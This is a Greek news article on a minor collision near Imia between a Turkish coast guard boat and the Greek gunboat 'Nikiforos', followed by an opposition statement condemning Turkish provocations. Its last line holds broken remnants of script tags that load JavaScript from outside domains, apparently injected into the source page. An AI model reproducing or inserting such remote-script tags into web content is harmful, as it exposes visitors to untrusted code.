Παραλίγο επεισόδιο στην περιοχή των Ιμίων

Τουρκική ακταιωρός «ακούμπησε» σε ελληνική κανονιοφόρο

Ένα περιστατικό μικρής έντασης έλαβε χώρα το μεσημέρι της Τετάρτης, στην ευρύτερη περιοχή των Ιμίων. Ακταιωρός του τουρκικού λιμενικού βρέθηκε στα ελληνικά χωρικά ύδατα και, έπειτα από αποτυχημένο ελιγμό, ακούμπησε με την ελληνική κανονιοφόρο «Νικηφόρος» που περιπολούσε στην περιοχή.

Σύμφωνα με τα όσα έχουν γίνει γνωστά στην περιοχή πλέει εδώ και μερικές ημέρες η κανονιοφόρος «Νικηφόρος», καθώς την περίοδο αυτή αυξάνεται η τουρκική προκλητικότητα στα Ίμια (λόγω της κρίσης του 1996).

Σήμερα, στις 14.30, ακταιωρός του τουρκικού λιμενικού βρέθηκε σε ελληνικά χωρικά ύδατα και, έπειτα από έναν επικίνδυνο ελιγμό, παραβίασε τους κανόνες ασφαλούς σύγκρουσης και ακούμπησε πλευρικά με το «Νικηφόρος».

Δεν υπήρξαν ζημιές από το περιστατικό, ενώ το τουρκικό πλοίο αποχώρησε από το σημείο.

Για το περιστατικό εξέδωσε ήδη ανακοίνωση η ΝΔ με τον τομεάρχη Εξωτερικών Γιώργο Κουμουτσάκο να δηλώνει:

Καταδικάζουμε τη σημερινή, σοβαρότατη πρόκληση από πλευράς Τουρκίας στην περιοχή των Ιμίων. Η συνεχιζόμενη παραβίαση των ελληνικής κυριαρχίας και κυριαρχικών δικαιωμάτων από τουρκικής πλευράς υπογραμμίζει το επικίνδυνο αναθεωρητικό πνεύμα με το οποίο αντιμετωπίζει τις ελληνοτουρκικές σχέσεις η ηγεσία της γειτονικής χώρας. Η συμπεριφορά αυτή βλάπτει τα συμφέροντα και των δύο λαών και λειτουργεί αποσταθεροποιητικά για ολόκληρη την περιοχή.

Το ίδιο το επεισόδιο, όμως, ήρθε να προστεθεί στις πολυάριθμες παραβιάσεις του εθνικού εναέριου χώρου και των εθνικών χωρικών υδάτων, στις παράτυπες και παράνομες δεσμεύσεις περιοχών από πλευράς Τουρκίας για τη διεξαγωγή ασκήσεων, καθώς και σε σειρά απαράδεκτων αναθεωρητικών δηλώσεων της τουρκικής πολιτικής ηγεσίας και εκπροσώπων των Κομμάτων της Αντιπολίτευσης κατά το διάστημα που ακολούθησε την επίσκεψη Ερντογάν στη χώρα μας.

Η εξαιρετικά δυσάρεστη και ανησυχητική αυτή κατάσταση επιβεβαιώνει δυστυχώς την εκτίμησή ότι η επίσκεψη του Τούρκου Προέδρου στην Ελλάδα, τελικά δεν βελτίωσε αλλά τραυμάτισε περισσότερο τις ελληνοτουρκικές σχέσεις. Καταρρίπτει δε, τις αθεμελίωτα αισιόδοξες κυβερνητικές εκτιμήσεις για την επίσκεψη αυτή.

Συμπέρασμα: Η Κυβέρνηση οφείλει να κάνει ορθή εκτίμηση των γεγονότων προκειμένου να διαμορφώσει μια αποτελεσματική πολιτική απέναντι στην τουρκική παραβατικότητα.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>